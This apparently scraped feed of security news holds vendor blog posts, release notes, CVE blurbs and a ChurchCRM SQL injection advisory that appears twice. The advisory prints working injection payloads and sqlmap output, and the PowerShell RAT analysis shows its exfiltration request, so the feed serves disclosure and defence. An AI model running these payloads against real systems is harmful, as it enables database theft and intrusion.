The 360° Assessment & Certification from MRG-Effitas can offer guidance to SMBs looking for a simple, effective cybersecurity product. 
The post Why MRG-Effitas matters to SMBs appeared first on Malwarebytes Labs.

When selecting the right cybersecurity vendor to protect their operations, small- and medium-sized businesses (SMBs) can lean on several third-party research organizations that analyze which cybersecurity products can best prevent, detect, and clean up various types of cyberattacks today.

But these tests can sometimes assume a level of end-user complexity—and funding and staffing—that the average SMB might lack. Without a full-time security team, or even a single full-time internal IT hire, an SMB could unwittingly purchase a cybersecurity product that, while effective, requires a level of expertise they simply do not have.

This is where one third-party research team, in particular, can help.

MRG-Effitas, which produces quarterly reports about cybersecurity products that publicly participate in evaluations, focuses its analyses on “real world” malware attacks and detection capabilities. Not only do the researchers test malware samples that are currently infecting endpoints across the world, but the researchers also stress the importance of simple, effective notifications that will help the average user respond to any detected cyberthreat.

“Simulating normal user behaviour means that we pay special attention to all alerts given by security applications,” wrote the researchers in their most recent quarterly report for their program, the “360° Assessment & Certification.”

The 360° Assessment & Certification combines several tests that are then grouped into four separate certifications. Based on how a cybersecurity product performed in certain tests, that product will either earn a certificate or not. This almost-binary representation of a product’s performance is simple and effective, and it can help to quickly inform an SMB about whether a certain product is right for their company.

At the core of the MRG-Effitas certification process—which tests how products respond to known exploits, ransomware, botnets, adware, and more—is the user.

“A pass is given only when alerts are straightforward, and clearly suggest that the malicious action should be blocked,” the report said. “With this in mind, it is very important to note that the best choice for an average user is to keep things as simple as possible and not to overwhelm them with cryptic pop-ups, alerts or questions.”

****Testing and certification****

The 360° Assessment & Certification by MRG-Effitas involves the following nine rounds of testing:

*   In the Wild/Full Spectrum Test
*   PUA/Adware Test
*   Exploit/Fileless Test
*   Real Botnet Test
*   Banking Simulator Test
*   Ransomware Simulator Test
*   False Positive Ransomware Test
*   False Positive Test
*   Performance Test

Each test has a specific purpose, from testing how cybersecurity products respond to an end-user visiting a malicious URL that delivers malware, to the detection of non-malicious but meddlesome applications such as adware, to even testing how a product responds to live ransomware samples observed in real world applications, and to simulated ransomware samples developed by MRG-Effitas. Importantly, MRG-Effitas also tests the performance load of each cybersecurity product, analyzing how much time it takes to perform certain tasks on devices that have the cybersecurity product installed.

While MRG-Effitas performs testing in the above nine categories, it only awards certificates in four categories: The 360° Assessment, the 360° Exploit Degree, the 360° Online Banking Degree, and the 360° Ransomware Degree.

For the 360° Assessment, MRG-Effitas assigns two levels of certification—Level 1 and Level 2—depending on how successfully a cybersecurity product detected the cyberthreats that were launched at it during testing. A vendor only receives Level 1 certification if it detected all threats on “first exposure or via behaviour protection,” the report said, and it passed the Real Botnet Test.

The malware load used during the 360° Assessment is significant. In the most recent round, it involved 360 “In The Wild” samples that included: “20 trojans, 54 backdoors, 50 financial malware samples, 53 ransomware, 49 spyware, 84 malicious documents, \[and\] 50 malicious script files.”

Just four products publicly received a Level 1 certification in the recent 360° Assessment: Malwarebytes Endpoint Protection, Bitdefender Endpoint Security, Microsoft Windows Defender, and Symantec Endpoint Protection.

A similar test deploys 50 financial malware samples against the detection and protection capabilities of the cybersecurity products, along with simulated banking malware. Five products publicly received the 360° Online Banking Certification: Malwarebytes Endpoint Protection, Avira Antivirus Pro, Bitdefender Endpoint Security, ESET Endpoint Security, and Symantec Endpoint Protection.

****Ransomware simulations****

In just the past decade, ransomware has evolved tremendously. Developers of the infamous family of malware have gone from asking for measly sums of money from individuals to creating entire business models in which they license out their ransomware tool to other threat actors. When those threat actors successfully hit a business—which they could have purchased access to from other threat actors—the original ransomware developers take a cut of whatever eventual payment is made. To make matters worse, threat actors have also begun deploying ransomware that not only encrypts a company’s files, but it also first exfiltrates any sensitive data, which the threat actors then use as a second point of leverage: Pay up or your data will be published for everyone to see.

The researchers at MRG-Effitas, recognizing this rapid pace of ransomware evolution, have, for years, tested cybersecurity products against ransomware samples developed in-house that could represent where ransomware development is headed in just months or years.

In the most recent 360° Assessment & Certification, MRG-Effitas deployed 53 ransomware samples against the cybersecurity products, and an additional four simulated ransomware samples. To achieve the 360° Ransomware Certification, a product must have protected a device from the 53 ransomware samples and 4 simulated ransomware simulated samples, and it must have passed the false positive ransomware test.

In the most recent round of testing, all nine publicly-evaluated cybersecurity products achieved ransomware certification.

****Performance****

Understanding whether a cybersecurity product works well is, obviously, important. But of similar importance to SMBs is understanding what impact a cybersecurity product will have on a suite of endpoints. Without large budgets that could allow for constantly refreshed, new devices to be purchased, SMBs should consider how much a cybersecurity product could slow down their organizations’ devices.

Thankfully, MRG-Effitas analyzes cybersecurity products based on their impact on performing simple operations, like downloading a file, opening a Microsoft Office program, or opening a website. The analysis also measures the time spent performing a security software update and the CPU usage during the update process.

Unlike the certificates offered by MRG-Effitas for other categories, there is no certificate or “pass/fail” result when testing performance. Instead, SMBs can look at the performance measurements for each product in the latest 360° Assessment & Certification.

****Less “interpretation,” quicker answers****

The simplicity of MRG-Effitas’ 360° Assessment & Certification gives SMBs a quick guide into what cybersecurity products could be the right fit for them. Without having to dive into countless interpretive reports from each cybersecurity vendor, SMBs can instead look at the most recent 360° Assessment & Certification and ask themselves: Which of these products received certification and which did not?

Knowing that MRG-Effitas hews its testing ideology to the user—only offering certifications for products that clearly notify and warn users about how to respond to a threat—SMBs can be sure that whatever tool they choose will, at the very least, be easy to use on their end.

Why MRG-Effitas matters to SMBs

Research from Malwarebytes reveals an enormous, coronavirus-fuelled surge in malware detections in 2021.
The post How COVID-19 fuelled a surge in malware appeared first on Malwarebytes Labs.

2021 saw a massive surge in detections of malware, adware, and Potentially Unwanted Programs (PUPs). It didn’t matter what the computers were used for or what operating system they ran—across business and home computers, on Windows and on Mac, detections went up, enormously.

Detections of malware on Windows business machines were 143% higher in 2021 than in 2020, and 65% higher on consumer machines.

Windows malware detection totals 2019-2021

Detections of malware, adware, and PUPs on macOS increased almost 220%.

Mac malware, adware and PUP detection totals 2019-2021

The background to this extraordinary jump in detections is the coronavirus pandemic, so we call this surge in detections the “Covid bounce”.

**The Covid bounce**

In 2020, the recently-discovered novel coronavirus, and the restrictions put in place to slow its progress, caused trillions of dollars of lost economic activity and a mass migration of knowledge workers from offices to homes.

Almost all forms of business suffered—even illegal ones like cybercrime. Crooks were just as likely to get COVID-19 as anyone else, and the targets they preyed upon changed beyond recognition.

Many businesses wound down or folded, and those that didn’t had to upend their IT infrastructure overnight to support working from home. How people worked, where they worked, the tools they used, and the things they cared about were all in flux.

No wonder then, that in 2020, malware detections on Windows business machines fell 24%.

The effect was not spread evenly across all types of malware though. Detections of Emotet and TrickBot collapsed by 89% and 69% respectively, leading some to speculate that while these highly sophisticated forms of malware were extremely effective at permeating corporate networks they may be poorly adapted to exploit the work-from-home environment.

Meanwhile, detections of hacking tools, information stealers, and other malware that could help criminals better understand the transformation in their victims’ environments, increased considerably.

In 2021, as restrictions lifted gradually around the world, and as organisations and the criminals preying on them adapted to remote and hybrid work, detection numbers climbed precipitously.

And they didn’t simply return to the pre-Covid status quo, they soared past 2019’s numbers. In 2021, the detection numbers for business threats were 85% higher than in 2019, and consumer threat detections were 47% higher.

Cryptocurrency values soared in 2021 and, to nobody’s surprise, detections of malware that mines cryptocurrencies increased more than 300 precent.

Adware, spyware, and worms all displayed an enormous bounce back in 2021, climbing 200%, and detections of email threats showed a considerable “Covid bounce” too. But while the old guard of Emotet and TrickBot remained, they were not the presence of old as several new pretenders jostled for position.

It is impossible to say why detections bounced back so alarmingly last year, but the plain fact is that the world now is not the world of 2019. Events like the coronavirus pandemic have far-reaching effects that go far beyond the immediate, obvious and tragic health consequences, affecting all walks of life, even the security of your servers, laptops, and remote workers.

The pandemic accelerated the transition from a bricks-and-mortar to online existence, and for many businesses and services there is no going back.

After a period of adjustment and uncertainty in 2020, cybercrime seems to have emerged supremely well adapted to this new reality.

You can learn more about the Covid bounce and how it changed the outlook for cyberthreats into 2022 and beyond in the Malwarebytes 2022 Threat Review.

How COVID-19 fuelled a surge in malware

Microsoft's May Patch Tuesday update is triggering authentication errors.

Microsoft’s May Patch Tuesday update is triggering authentication errors.

Microsoft is alerting customers that its May Patch Tuesday update is causing authentications errors and failures tied to Windows Active Directory Domain Services. In a Friday update, Microsoft said it was investigating the issue.

The warning comes amid shared reports of multiple services and policies failing after installing the security update. “Authentication failed due to a user credentials mismatch. Either the user name provided does not map to an existing account or the password was incorrect.”  posted an admin to a Reddit thread on the topic.

According to Microsoft, the issue has been caused after installing the updates released on May 10, 2022.

“After installing updates released May 10, 2022 on your domain controllers, you might see authentication failures on the server or client for services such as Network Policy Server (NPS), Routing and Remote access Service (RRAS), Radius, Extensible Authentication Protocol (EAP), and Protected Extensible Authentication Protocol (PEAP),” Microsoft reported.

“An issue has been found related to how the mapping of certificates to machine accounts is being handled by the domain controller,” Microsoft added.

The domain controller is a server that is responsible for responding to authentication requests as well as verifying the user on a computer network, and the active directory is a type of directory service that stores the information about objects on a network and makes this information readily available for the users.

Microsoft added a note that the update will not affect the client’s Windows devices and non-domain controller windows servers, and will only cause issues for the server acting as a domain controller.

“Installation of updates released May 10, 2022, on client Windows devices and non-domain controller Windows Servers will not cause this issue. This issue only affects installation of May 10, 2022, updates installed on servers used as domain controllers.” Microsoft explains.

****Authentication Failure Caused by Security Update****

Microsoft releases another document, explaining further details related to the authentication problem caused by the security update addressing the privilege escalation vulnerabilities in Windows Kerbose and its Active Directory Domain Service.

The vulnerabilities are tracked as CVE-2022-26931 in Windows Kerberos with a high severity CVSS rating of 7.5 and CVE-2022-26923 (discovered by security researcher Oliver Lyak) in Microsoft’s Active Directory Domain Services. It has a CVSS score of 8.8 and is rated as high. An attacker can exploit the vulnerability if left unpatched and escalate the privilege to that of the domain admin.

****Workarounds****

The Domain administrators are advised by Microsoft to manually map the certificates to a user in Active Directory until the official updates are available.

“Domain administrators can manually map certificates to a user in Active Directory using the altSecurityIdentities attribute of the user’s Object,” Microsoft added.

“If the preferred mitigation will not work in your environment, please see ‘KB5014754—Certificate-based authentication changes on Windows domain controllers’ for other possible mitigations in the SChannel registry key section,” reported by Microsoft.

As per Microsoft any other mitigation method might not provide adequate security hardening.

According to Microsoft, the May 2022 update is allowing all authentication attempts unless the certificate is older than the user, this is because the updates automatically set the StrongCertificateBindingEnforcement registry key, “which changes the enforcement mode of the KDC to Disabled Mode, Compatibility Mode, or Full Enforcement Mode” Microsoft explains.

One Window Admin that spoke to _Bleepingcomputer_ said that the only way they were able to get some of the users log in with the following installation of the patch was to disable the  StrongCertificateBindingEnforcement key by settings its value to 0.

By changing the REG\_DWORD DataType value to 0, the admin can disable the strong certificate mapping check and can create the key from the scratch. This method is not recommended by Microsoft, but it’s the only way to allow all users to log in.

The issues are properly investigated by Microsoft and a proper fix should be available soon.

Microsoft also recently releases the 73 new patches of May’s monthly update of security fixes.

Microsoft’s May Patch Tuesday Updates Cause Windows AD Authentication Errors

Malwarebytes Threat Intelligence has uncovered an attack using the lure of information about the war in Ukraine to target people in Germany.
The post Custom PowerShell RAT targets Germans seeking information about the Ukraine crisis appeared first on Malwarebytes Labs.

_This blog post was authored by Hossein Jazi and Jérôme Segura_

Populations around the world—and in Europe in particular—are following the crisis in Ukraine very closely, and with events unfolding on a daily basis, people are hungry for information.

Although all countries have reasons to be concerned, the situation is Germany is more complicated than most. It is one of the few European countries to have received criticism for its attitude to the Ukraine-Russia conflict, as it struggles to end its reliance on Russian energy, and Moscow recently imposed sanctions on Gazprom Germania, further increasing economic tensions.

This week our analysts discovered a new campaign that plays on these concerns by trying to lure Germans with a promise of updates on the current threat situation in Ukraine. The downloaded document is in fact decoy for a Remote Access Trojan (RAT) capable of stealing data and executing other malicious commands on a victim’s computer.

**Decoy site lures victims with Ukraine situation**

Threat actors registered an expired German domain name at collaboration-bw\[.\]de that was formally used as a collaboration platform to develop new ideas for the Baden-Württemberg state.

Threat actors registered an expired domain associated with Baden-Württemberg

The threat actors used the domain to host a website that looked like the official Baden-Württemberg website, baden-wuerttemberg.de.

A comparison of the real baden-wuerttemberg.de (top) and the malicious fake (bottom)

With this copycat, the attackers created the perfect placeholder for the lure they wanted their victims to download: A file tantalising called 2022-Q2-Bedrohungslage-Ukraine (threat situation in Ukraine for Q2), offered via a prominent blue download button.

The website promises important information and tips about the Ukraine crisis

An English translation of the page reads:

**Important, current threat situation regarding the Ukraine crisis**

On this website you will always find the most important information and tips for dealing with the current threat posed by the Ukraine crisis. Please download the document now and read through the current information. The document is constantly updated and is up to date. Our suggested tips can be practically implemented in everyday work and you should already implement them today. Thanks for your support.

**File analysis**

The archive file called 2022-Q2-Bedrohungslage-Ukraine contains a file named 2022-Q2-Bedrohungslage-Ukraine.chm. The CHM format is Microsoft’s HTML help file format, which consists of a number of compiled HTML files.

The CHM file displays a fake error message

Victims will get a fake error message when they open up that file, while PowerShell quietly runs a Base64 command.

PowerShell executes a Base64-encoded command

After de-obfuscating the command we can see it is designed to execute a script downloaded from the fake Baden-Württemberg website, using Invoke-Expression (IEX).

The PowerShell code fetches and executes a malicious script

The malicious script downloaded from the fake Baden-Württemberg website

The downloaded script creates a folder called SecuriyHealthService in the current user directory and drops two files into it: MonitorHealth.cmd and a script called Status.txt. The .cmd file is very simple and just executes Status.txt through PowerShell.

Finally, the downloaded script makes MonitorHealth.cmd persistent by creating a scheduled task that will execute it each day at a specific time.

**PowerShell RAT (Status.txt)**

Status.txt is a RAT written in PowerShell. It starts its activities by collecting some information about the victim’s computer, such as the current username and working directory, and the computer’s hostname. It also builds a unique id for the victim, the clientid.

This data is exfiltrated as a JSON data structure sent to the server via a POST request:

$json = '{
  "type": "newclient",
  "result": "",
  "pwd": "' + $pwd\_b64 + '",
  "cuser": "' + $cuser + '",
  "hostname": "' + $hname + '",
  "clientid": "' + $clientid + '"
}';

$headers = @{'X-Request-ID' = $strhash;}

However, before executing this requests the script will first bypass the Windows Antimalware Scan Interface (AMSI) using an AES-encrypted function called bypass. It is decrypted using a generated key and IV before execution.

The bypass function that contains the encrypted script to bypass AMSI.

The content of the AMSI bypass script after decryption

This RAT has the following capabilities:

*   **Download** (type: D0WNl04D): Download files from server
*   **Upload** (type: UPL04D): Upload file to the server
*   **LoadPS1** (type: L04DPS1): Load and execute a PowerShell script
*   **Command** (type: C0MM4ND): Execute a specific command

**German command and control server**

The attack was thoughtfully carried out—even ensuring that the stolen data was sent to a German domain name, kleinm\[.\]de, to avoid suspicion.

It is not easy to attribute this activity to a specific actor, and there are no solid indicators to support attribution. Based on motivation alone, we hypothesise that a Russian threat actor could be targeting German users, but without clear connections in infrastructure or similarities to known TTPs, such attribution is weak.

The Malwarebytes Threat Intelligence team continues to monitor attacks taking advantage of the war in Ukraine while ensuring our customers are protected.

**Indicators of Compromise (IOCs)**

**Phishing site**

collaboration-bw\[.\]de/bedrohung-ukr.html

**Lure**

2022-Q2-Bedrohungslage-Ukraine.zip  
2430f68285120686233569e51e2147914dc87f82c7dbdf07fe0c34dbb1aca77c  
2022-Q2-Bedrohungslage-Ukraine.chm  
80bad7e0d5a5d2782674bb8334dcca03534aa831c37aebb5962da1cd1bec4130

**Status.txt**  
a5d8beaa832832576ca97809be4eee9441eb6907752a7e1f9a390b29bbb9fe1f

**MonitorHealth.cmd**  
fc71522a4125ca4bdc5e5deca4a6498e7f2da4408614c2e1284c3ae8c083a5fd

**C2**

kleinm\[.\]de

**MITRE ATT&CK**

Tactic

ID

Name

Description

Execution

T1059

Command and Scripting Interpreter

Starts cmd.exe to run hh.exe

Executes PowerShell script to download and execute a script

Persistence

T1053

Scheduled Task/Job

Executes task scheduler to add MonitorHealth.cmd as a daily task

Defense evasion

T1222

File and Directory Permissions Modification

Uses attrib.exe to hide SecuriyHealthService folder

Custom PowerShell RAT targets Germans seeking information about the Ukraine crisis

1.  Releases
2.  v1.22.0

Compare

Choose a tag to compare

Latest

Latest

 github-actions released this

· 1 commit to master since this release

v1.22.0

5b2a402

Compare

Choose a tag to compare

*   Prohibit negative size argument to table/new.
*   Add module/value.
*   Remove file/popen. Use os/spawn with the :pipe options instead.
*   Fix bug in peg thru and to combinators.
*   Fix printing issue in doc macro.
*   Numerous updates to function docstrings
*   Add defdyn aliases for various dynamic bindings used in core.
*   Install janet.h symlink to make Janet native libraries and applications  
    easier to build without jpm.

**Assets**8

*   janet-1.22.0-windows-x64-installer.msi
    
    1.63 MB
    
*   janet-v1.22.0-linux-x64.tar.gz
    
    1.26 MB
    
*   janet-v1.22.0-macos-x64.tar.gz
    
    1.35 MB
    
*   janet.c
    
    2.22 MB
    
*   janet.h
    
    79.6 KB
    
*   shell.c
    
    31 KB
    
*   Source code (zip)
    
*   Source code (tar.gz)
    

2 people reacted

0 Join discussion

CVE-2022-30763: Release Janet 1.22.0 · janet-lang/janet

A SQL injection vulnerability exists in ChurchCRM version 2.0.0 to 4.4.5 that allows an authenticated attacker to issue an arbitrary SQL command to the database through the unsanitized EN_tyid, theID and EID fields used when an Edit action on an existing record is being performed.

*   Sat, May 14, 2022
*   4-minute read

**Summary**

     1
     2
     3
     4
     5
     6
     7
     8
     9
    10
    11
    12
    

    Product:                   Church Web CRM
    Manufacturer:              ChurchCRM
    Affected Version(s):       ChurchCRM 2.0.0 <= 4.4.5 
    Tested Version(s):         4.4.5
    Vulnerability Type:        SQL Injection (CWE-89) 
    Risk Level:                High
    Solution Status:           Unfixed
    Manufacturer Notification: 2021-09-16
    Solution Date:             n/a
    Public Disclosure:         2022-05-14
    CVE Reference:             CVE-2021-41965
    Author of Advisory:        Alexander Bilz
    

**Overview**

The manufacturer describes the product as follows (see 1):

> “An OpenSource CRM System Built for Churches. Your Church can benefit from giving your staff and volunteers the tools they need to make every interaction more valuable.”

The software comes with an abundance of features relevant to churches and managing a congregation. Among others it allows to conduct:

*   Conduct Fundraisers
*   Manage Church Members
*   Publish Events
*   Manage Sunday Schools

The source code can be found on ChurchCRM’s GitHub account 2.

ChurchCRM is vulnerable to SQL injection attacks due to a lack of input validation and no additional protection mechanisms.

**Vulnerability Details**

Church CRM allows its users to schedule church events, such as church services, Sunday school or summer camps. Once an event has been created it can also be edited and deleted again through the events page.

Hereby, it was detected that the parameter EID, which is sent along when editing an existing entry, is susceptible to an SQL injection attack. On edit, data is posted to the EventEditor.php where it is executed on the database.

Similarly, the EN_tyid parameter of the EditEventTypes.php and theID of the EventNames.php endpoint can be abused for injecting arbitrary SQL queries.

Different types of SQL injection techniques can be applied, including:

*   Boolean-based blind
*   Time-based blind

The vulnerable functionality is only accessible when authenticated.

**Proof of Concept (PoC)**

As a proof of concept, the EN\_tyid parameter, which is sent when an event is edited, will be abused to query the database management system using sqlmap 3.

Let’s start with the HTTP request I had captured in Burp Suite.

     1
     2
     3
     4
     5
     6
     7
     8
     9
    10
    11
    12
    13
    14
    15
    

    POST /churchcrm/EditEventTypes.php HTTP/1.1  
    Host: <IP>  
    Content-Length: 21  
    Cache-Control: max-age=0  
    Upgrade-Insecure-Requests: 1  
    Origin: http://<IP> 
    Content-Type: application/x-www-form-urlencoded  
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.150 Safari/537.36  
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9  
    Referer: http://<IP>/churchcrm/EventNames.php  
    Accept-Encoding: gzip, deflate  
    Accept-Language: en-US,en;q=0.9  
    Cookie: <Cookie Value>  
    Connection: close  
    EN_tyid=4&Action=Edit
    

This request could then be passed to sqlmap for injecting the EN_tyid parameter.

     1
     2
     3
     4
     5
     6
     7
     8
     9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36
    

    ┌──(kali㉿kali)-[~/ChurchCRM] 
    └─$ sqlmap -r churchcrm.txt -p EN_tyid -dbs 
            ___ 
           __H__                                                                  
     ___ ___[,]_____ ___ ___  {1.5.5#stable}                                      
    |_ -| . [.]     | .'| . |                                                     
    |___|_  [)]_|_|_|__,|  _|                                                     
          |_|V...       |_|   http://sqlmap.org                                   
    [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program 
    [*] starting @ 10:42:27 /2021-09-16/ 
    [10:42:27] [INFO] parsing HTTP request from 'churchcrm.txt' 
    [10:42:28] [INFO] resuming back-end DBMS 'mysql'  
    [10:42:28] [INFO] testing connection to the target URL 
    sqlmap resumed the following injection point(s) from stored session: 
    --- 
    Parameter: EN_tyid (POST) 
        Type: time-based blind 
        Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) 
        Payload: EN_tyid=4' AND (SELECT 8001 FROM (SELECT(SLEEP(5)))vpfX) AND 'KFAy'='KFAy&Action=Edit 
        Type: UNION query 
        Title: Generic UNION query (NULL) - 9 columns 
        Payload: EN_tyid=-8227' UNION ALL SELECT NULL,CONCAT(0x7162766a71,0x58587254614b525a474f487269586c6d55424859667574764267587a484c79595a78496f66665959,0x7178706271),NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -&Action=Edit 
    --- 
    [10:42:29] [INFO] the back-end DBMS is MySQL 
    web application technology: Apache 2.4.48, PHP 7.3.30 
    back-end DBMS: MySQL >= 5.0.12 (MariaDB fork) 
    [10:42:29] [INFO] fetching database names 
    [10:42:31] [INFO] retrieved: 'information_schema' 
    [10:42:32] [INFO] retrieved: 'test' 
    [10:42:33] [INFO] retrieved: 'churchcrm' 
    available databases [3]:                                                     
    [*] churchcrm 
    [*] information_schema 
    [*] test 
    [10:42:33] [INFO] fetched data logged to text files under '/home/kali/.local/share/sqlmap/output/192.168.11.170'                                           
    [*] ending @ 10:42:33 /2021-09-16/
    

**Disclosure Timeline**

I had reached out immediately to the vendor via email on 2021-09-16, who never replied to my request. Following a responsible disclosure approach, I decided to file for a CVE and ultimately disclose the vulnerability publicly.

The overall timeline for disclosing this vulnerability was as follows:

*   2021-09-16: Vulnerability discovered
*   2021-09-16: Vulnerability reported to the manufacturer
*   2022-05-02: CVE has been reserved
*   2022-05-14: Public disclosure of the vulnerability

**Credits**

This security vulnerability was found by Alexander Bilz.

*   E-Mail: mail\[at\]alexbilz.com
*   Public Key: https://www.alexbilz.com/ABilz.asc
*   Key ID: 0X474CECFD3DBC6880
*   Key Fingerprint: 6C0E A8D0 C428 ED1D 8C2E C4A0 474C ECFD 3DBC 6880

**Disclaimer**

The information provided in this security advisory is provided “as is” and without warranty of any kind. Details of this security advisory may be updated to provide as accurate information as possible.

**References**

1.  Product website for ChurchCRM http://churchcrm.io/ ↩︎
    
2.  ChurchCRM CRM Sourcecode https://github.com/ChurchCRM/CRM ↩︎
    
3.  Link to sqlmap https://sqlmap.org/ ↩︎

CVE-2021-41965: SQL Injection Vulnerability in ChurchCRM (CVE-2021-41965)

*   Sat, May 14, 2022
*   4-minute read

**Summary**

     1
     2
     3
     4
     5
     6
     7
     8
     9
    10
    11
    12
    

    Product:                   Church Web CRM
    Manufacturer:              ChurchCRM
    Affected Version(s):       ChurchCRM 2.0.0 <= 4.4.5 
    Tested Version(s):         4.4.5
    Vulnerability Type:        SQL Injection (CWE-89) 
    Risk Level:                High
    Solution Status:           Unfixed
    Manufacturer Notification: 2021-09-16
    Solution Date:             n/a
    Public Disclosure:         2022-05-14
    CVE Reference:             CVE-2021-41965
    Author of Advisory:        Alexander Bilz
    

**Overview**

The manufacturer describes the product as follows (see 1):

> “An OpenSource CRM System Built for Churches. Your Church can benefit from giving your staff and volunteers the tools they need to make every interaction more valuable.”

The software comes with an abundance of features relevant to churches and managing a congregation. Among others it allows to conduct:

*   Conduct Fundraisers
*   Manage Church Members
*   Publish Events
*   Manage Sunday Schools

The source code can be found on ChurchCRM’s GitHub account 2.

ChurchCRM is vulnerable to SQL injection attacks due to a lack of input validation and no additional protection mechanisms.

**Vulnerability Details**

Church CRM allows its users to schedule church events, such as church services, Sunday school or summer camps. Once an event has been created it can also be edited and deleted again through the events page.

Hereby, it was detected that the parameter EID, which is sent along when editing an existing entry, is susceptible to an SQL injection attack. On edit, data is posted to the EventEditor.php where it is executed on the database.

Similarly, the EN_tyid parameter of the EditEventTypes.php and theID of the EventNames.php endpoint can be abused for injecting arbitrary SQL queries.

Different types of SQL injection techniques can be applied, including:

*   Boolean-based blind
*   Time-based blind

The vulnerable functionality is only accessible when authenticated.

**Proof of Concept (PoC)**

As a proof of concept, the EN\_tyid parameter, which is sent when an event is edited, will be abused to query the database management system using sqlmap 3.

Let’s start with the HTTP request I had captured in Burp Suite.

     1
     2
     3
     4
     5
     6
     7
     8
     9
    10
    11
    12
    13
    14
    15
    

    POST /churchcrm/EditEventTypes.php HTTP/1.1  
    Host: <IP>  
    Content-Length: 21  
    Cache-Control: max-age=0  
    Upgrade-Insecure-Requests: 1  
    Origin: http://<IP> 
    Content-Type: application/x-www-form-urlencoded  
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.150 Safari/537.36  
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9  
    Referer: http://<IP>/churchcrm/EventNames.php  
    Accept-Encoding: gzip, deflate  
    Accept-Language: en-US,en;q=0.9  
    Cookie: <Cookie Value>  
    Connection: close  
    EN_tyid=4&Action=Edit
    

This request could then be passed to sqlmap for injecting the EN_tyid parameter.

     1
     2
     3
     4
     5
     6
     7
     8
     9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36
    

    ┌──(kali㉿kali)-[~/ChurchCRM] 
    └─$ sqlmap -r churchcrm.txt -p EN_tyid -dbs 
            ___ 
           __H__                                                                  
     ___ ___[,]_____ ___ ___  {1.5.5#stable}                                      
    |_ -| . [.]     | .'| . |                                                     
    |___|_  [)]_|_|_|__,|  _|                                                     
          |_|V...       |_|   http://sqlmap.org                                   
    [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program 
    [*] starting @ 10:42:27 /2021-09-16/ 
    [10:42:27] [INFO] parsing HTTP request from 'churchcrm.txt' 
    [10:42:28] [INFO] resuming back-end DBMS 'mysql'  
    [10:42:28] [INFO] testing connection to the target URL 
    sqlmap resumed the following injection point(s) from stored session: 
    --- 
    Parameter: EN_tyid (POST) 
        Type: time-based blind 
        Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) 
        Payload: EN_tyid=4' AND (SELECT 8001 FROM (SELECT(SLEEP(5)))vpfX) AND 'KFAy'='KFAy&Action=Edit 
        Type: UNION query 
        Title: Generic UNION query (NULL) - 9 columns 
        Payload: EN_tyid=-8227' UNION ALL SELECT NULL,CONCAT(0x7162766a71,0x58587254614b525a474f487269586c6d55424859667574764267587a484c79595a78496f66665959,0x7178706271),NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -&Action=Edit 
    --- 
    [10:42:29] [INFO] the back-end DBMS is MySQL 
    web application technology: Apache 2.4.48, PHP 7.3.30 
    back-end DBMS: MySQL >= 5.0.12 (MariaDB fork) 
    [10:42:29] [INFO] fetching database names 
    [10:42:31] [INFO] retrieved: 'information_schema' 
    [10:42:32] [INFO] retrieved: 'test' 
    [10:42:33] [INFO] retrieved: 'churchcrm' 
    available databases [3]:                                                     
    [*] churchcrm 
    [*] information_schema 
    [*] test 
    [10:42:33] [INFO] fetched data logged to text files under '/home/kali/.local/share/sqlmap/output/192.168.11.170'                                           
    [*] ending @ 10:42:33 /2021-09-16/
    

**Disclosure Timeline**

I had reached out immediately to the vendor via email on 2021-09-16, who never replied to my request. Following a responsible disclosure approach, I decided to file for a CVE and ultimately disclose the vulnerability publicly.

The overall timeline for disclosing this vulnerability was as follows:

*   2021-09-16: Vulnerability discovered
*   2021-09-16: Vulnerability reported to the manufacturer
*   2022-05-02: CVE has been reserved
*   2022-05-14: Public disclosure of the vulnerability

**Credits**

This security vulnerability was found by Alexander Bilz.

*   E-Mail: mail\[at\]alexbilz.com
*   Public Key: https://www.alexbilz.com/ABilz.asc
*   Key ID: 0X474CECFD3DBC6880
*   Key Fingerprint: 6C0E A8D0 C428 ED1D 8C2E C4A0 474C ECFD 3DBC 6880

**Disclaimer**

The information provided in this security advisory is provided “as is” and without warranty of any kind. Details of this security advisory may be updated to provide as accurate information as possible.

**Copyright**

Creative Commons - Attribution (by) - Version 3.0 URL: http://creativecommons.org/licenses/by/3.0/deed.en

**References**

1.  Product website for ChurchCRM http://churchcrm.io/ ↩︎
    
2.  ChurchCRM CRM Sourcecode https://github.com/ChurchCRM/CRM ↩︎
    
3.  Link to sqlmap https://sqlmap.org/ ↩︎

Webmin through 1.991, when the Authentic theme is used, allows remote code execution when a user has been manually created (i.e., not created in Virtualmin or Cloudmin). This occurs because settings-editor_write.cgi does not properly restrict the file parameter.

CVE-2022-30708: Webmin

A buffer overflow vulnerability in the SonicWall SSL-VPN NetExtender Windows Client (32 and 64 bit) in 10.2.322 and earlier versions, allows an attacker to potentially execute arbitrary code in the host windows operating system.

Tag

#windows